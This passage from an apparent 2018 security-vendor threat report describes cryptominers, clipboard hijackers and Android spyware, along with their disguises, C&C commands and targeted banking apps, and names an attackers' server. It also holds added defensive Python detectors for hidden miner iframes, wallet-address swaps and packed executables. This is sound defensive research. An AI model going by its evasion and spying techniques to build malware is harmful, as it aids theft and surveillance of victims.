Below is another cunning technique that turns an infected machine into a slave of the attacker.

3.2 WinstarNssmMiner, a system killer

Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.

The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.

The malicious code disguised as svchost.exe

Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.

WinstarNssmMiner spreading around the world


Cryptominers can kill not only victims' systems but also their cryptomining competitors.

3.3 CoinMiner kills rivals

CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.

CoinMiner kills its rivals as follows.

The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.


The code downloads CoinMiner and checks if a miner is already running

The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.

In this way CoinMiner gains undivided occupation of the victim's computer to use its resources for mining cryptocurrency.


Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing user detection. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe.

The iframe loads the URL shortener

The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we can find the familiar link to CoinHive.

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
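The check the user in this scenario was missing is a scanner that decodes the base64 layer before looking for the iframe. The Python below is an added example (not code from the report): it parses a page, decodes every base64-looking string literal, and reports iframes that are 1x1 or point at a miner or short-link host. The HTML sample is constructed; cnhv.co and coinhive.com are the hosts named on this page, and the literal regex and decoding depth are assumptions.

```python
"""Scan a page for the obfuscated CoinHive loader pattern described above:
a base64 blob written into the DOM that expands to a near-invisible iframe
pointing at a URL shortener.

Added example, not from the Comodo report. The HTML sample is constructed;
the miner/short-link host list is a starting point only.
"""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# cnhv.co is the CoinHive short-link domain shown on this page.
MINER_HOSTS = {"coinhive.com", "cnhv.co"}

# document.write(atob("...")) and eval-wrapped literals are the usual carriers:
# any quoted run of base64 alphabet of plausible length is a candidate.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{24,}={0,2})["']""")


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _decode_candidates(html: str):
    """Yield decoded text for every base64-looking literal in the page."""
    for match in B64_LITERAL.finditer(html):
        try:
            yield base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue


def find_hidden_iframes(html: str, depth: int = 2) -> list:
    """Return suspicious iframes found in the page or in decoded base64 layers.

    An iframe is suspicious when both its width and height are 0 or 1, or
    when its src host is a known miner/short-link host. `depth` bounds how
    many nested base64 layers are unwrapped (assumption: two is enough for
    the pattern shown on this page).
    """
    found = []
    layers = [html]
    for _ in range(depth):
        next_layers = []
        for layer in layers:
            parser = _IframeCollector()
            parser.feed(layer)
            for frame in parser.iframes:
                src = frame.get("src") or ""
                host = (urlparse(src).hostname or "").lower()
                tiny = all(str(frame.get(k, "100")).strip() in ("0", "1") for k in ("width", "height"))
                if tiny or host in MINER_HOSTS:
                    found.append({"src": src, "tiny": tiny, "host": host})
            next_layers.extend(_decode_candidates(layer))
        layers = next_layers
    return found


# Constructed sample page: the iframe only exists after decoding the literal.
_INNER = '<iframe src="https://cnhv.co/constructed" width="1" height="1"></iframe>'
SAMPLE_PAGE = '<html><body><script>document.write(atob("%s"));</script></body></html>' % (
    base64.b64encode(_INNER.encode()).decode()
)
# Constructed clean page: a normal, visible embedded video.
CLEAN_PAGE = '<html><body><iframe src="https://example.org/video" width="640" height="360"></iframe></body></html>'

if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE_PAGE))
    print(find_hidden_iframes(CLEAN_PAGE))
```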

The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or to fill in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it changes it to the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
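The swap above succeeds because nothing compares what the user copied with what is pasted. As an added example (not code from the report), the Python below models the check a wallet front-end or endpoint agent can make: remember the address the user intentionally copied, confirm at send time that the clipboard still holds it, and verify the Base58Check checksum so a corrupted address is rejected too. The clipboard is simulated; the two addresses are the ones quoted above, and the ClipboardGuard class and its method names are constructed for this example.

```python
"""Defensive check against clipboard wallet-address swapping.

Added example, not code from the Comodo report. It models what a wallet
front-end or endpoint agent can do: remember what the user copied, then,
at paste/send time, confirm the clipboard still holds that address and
that the address passes Base58Check. The clipboard itself is simulated.
"""
import hashlib
import re

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Shape of a legacy (P2PKH/P2SH) Bitcoin address: leading 1 or 3, Base58 body.
BTC_ADDR = re.compile(r"^[13][" + ALPHABET + r"]{25,34}$")


def b58encode(raw: bytes) -> str:
    """Base58 encode, preserving leading zero bytes as leading '1's."""
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, r = divmod(n, 58)
        out = ALPHABET[r] + out
    pad = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * pad + out


def b58decode(s: str) -> bytes:
    """Base58 decode; raises ValueError on characters outside the alphabet."""
    n = 0
    for ch in s:
        n = n * 58 + ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def base58check_encode(version: bytes, payload: bytes) -> str:
    """version || payload || first 4 bytes of SHA256(SHA256(version || payload))."""
    data = version + payload
    checksum = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    return b58encode(data + checksum)


def base58check_valid(addr: str) -> bool:
    """True if the trailing 4-byte checksum matches the rest of the address."""
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) < 5:
        return False
    data, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4] == checksum


class ClipboardGuard:
    """Tracks the address the user intentionally copied and checks it at send time."""

    def __init__(self):
        self.expected = None

    def on_user_copy(self, text: str):
        # Only remember clipboard contents that look like a wallet address.
        text = text.strip()
        self.expected = text if BTC_ADDR.match(text) else None

    def check_before_send(self, clipboard_now: str) -> dict:
        now = clipboard_now.strip()
        swapped = self.expected is not None and now != self.expected
        checksum_ok = base58check_valid(now)
        return {"swapped": swapped, "checksum_ok": checksum_ok, "safe": not swapped and checksum_ok}


# Addresses from the report's example (user copied the first, malware swapped in the second).
COPIED = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
SWAPPED_IN = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"

if __name__ == "__main__":
    guard = ClipboardGuard()
    guard.on_user_copy(COPIED)
    print("untouched clipboard:", guard.check_before_send(COPIED))
    print("hijacked clipboard: ", guard.check_before_send(SWAPPED_IN))
```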


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1 Naver Defender

Version-2 Netease Defender

Version-3

PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details: contacts, ID, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control over the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim device.

Global Threat Report Q2 2018 Edition

Page 29 of 73

4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions.

Version-1: Telegram, Groups, انتخاب دھم

Version-2: Postrall, Yes For Referendum, انتخاب دھم

Version-3: Celebs Gone Wild, جریدة النھار الكویتیة, 剑侠挂机

Version-4: VPN Easy, DroFirewall, m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.

In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:

Takes control of the Bluetooth adapter

Extracts data about accounts, contact details and installed apps

Extracts data from the WhatsApp message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook, Chrome

Disguises of Xloader

After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs

Extract contact details

Keep Wi-Fi always turned on

Version 2 can execute additional commands:

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access a location specified by the attackers

Make recordings

Make calls

4.1.5 Stalker Spy

The next malware in the row is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service

Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

Send_SMS: extract SMS content and send it to the C&C server

Send_USSD: send the USSD to the C&C server

Gethistory: monitor browser history

Start_AllApp: gather info about installed applications

Send_call: set the Intent action to call

Forward_call: forward incoming calls

ResForward_call: reset call forwarding

Go_Smsmnd: delete SMS content

Go_GetAlls: get SMS history

Dell_sms: delete SMS content in a conversation

Send_spam: send spam SMS

Start_Inject: call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, as you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

contacts - Get contact details and email ID

Mute - Set action to mute

Mms - Get MMS content

info - Get device information

4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version 2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

depostbankfinanzassistent

plmbank

aibibankandroid

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party play stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton

شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack

Version-2: TSF Launcher

Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via... another cryptominer, named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: a thief robbing a thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to the malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
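The two properties the paragraphs above describe, a compressed body that a small decompression stub unpacks at run time and a packer that has been modified so its tell-tale names no longer match, are exactly what a defender's packer triage checks for. The following script is an added example, not code from the report or from Comodo: it parses the section table of a Windows PE image, scores each section's raw bytes with Shannon entropy (compressed or encrypted data sits close to 8 bits per byte, ordinary code and text far lower) and flags sections that either carry a known packer name such as UPX1 or look packed regardless of their name, which is what catches a renamed "modified UPX" section. The packer name list, the 7.0-bit threshold and the minimal PE image built at the bottom are all constructed for this demonstration.

```python
"""Packer triage heuristic: section names plus per-section entropy.

Added, defender-side example (not code from the report or from Comodo):
parse the section table of a Windows PE image, compute the Shannon entropy
of each section's raw bytes, and flag sections whose name matches a known
packer or whose content looks compressed/encrypted. The packer name list
and the 7.0-bit threshold are assumptions chosen for this demo; the PE image
at the bottom is constructed inline so the script runs offline.
"""
import math
import random
import struct
from collections import Counter

# Assumed list of section names left behind by common packers (UPX & co.).
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".packed", b"MPRESS1", b".aspack"}
HIGH_ENTROPY = 7.0       # bits/byte; compressed or encrypted data sits near 8.0
MIN_SECTION_BYTES = 256  # tiny sections give unreliable entropy estimates


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 if empty)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Return [(name, raw_bytes)] from the section table of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # IMAGE_FILE_HEADER (20 bytes)
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size              # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_verdict(pe: bytes):
    """Per section: (name, entropy, [reasons]); an empty reason list means 'looks unpacked'."""
    findings = []
    for name, raw in parse_sections(pe):
        ent = shannon_entropy(raw)
        reasons = []
        if name in PACKER_SECTION_NAMES:
            reasons.append("known packer section name")
        if len(raw) >= MIN_SECTION_BYTES and ent > HIGH_ENTROPY:
            reasons.append(f"high entropy {ent:.2f}")
        findings.append((name.decode("ascii", "replace"), round(ent, 2), reasons))
    return findings


def build_sample_pe(sections):
    """Construct a minimal PE image (test input only; not a runnable binary)."""
    opt_size = 0                      # no optional header needed to read sections
    e_lfanew = 0x40
    table = e_lfanew + 4 + 20
    data_start = table + 40 * len(sections)
    header = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    header += b"PE\0\0"
    header += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    body = bytearray()
    for name, raw in sections:
        ptr = data_start + len(body)
        header += name.ljust(8, b"\0") + struct.pack("<IIII", len(raw), 0x1000, len(raw), ptr)
        header += b"\0" * 16          # relocs/linenumbers/characteristics: unused here
        body += raw
    return bytes(header) + bytes(body)


# Constructed sample: plain code-like text, a UPX-named section of random
# bytes (stands in for compressed code) and a renamed packed section that
# only the entropy check catches, as a modified UPX would leave behind.
_rng = random.Random(2018)
PACKED = bytes(_rng.getrandbits(8) for _ in range(4096))
PLAIN = b"ordinary program text and tables with low entropy; " * 80
SAMPLE_PE = build_sample_pe([(b".text", PLAIN), (b"UPX1", PACKED),
                             (b".xyz", PACKED[:2048]), (b".rsrc", PLAIN[:512])])

if __name__ == "__main__":
    for name, ent, reasons in packer_verdict(SAMPLE_PE):
        print(f"{name:8s} entropy={ent:.2f}  {'; '.join(reasons) or 'looks unpacked'}")
```

Running it prints one line per section: `.text` and `.rsrc` look unpacked, `UPX1` is flagged on both name and entropy, and the renamed `.xyz` section is flagged on entropy alone. Entropy is a heuristic, not a verdict: legitimately compressed resources, embedded certificates and media also score high, so in practice the flag should feed a triage queue (unpack and rescan) rather than a block decision.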

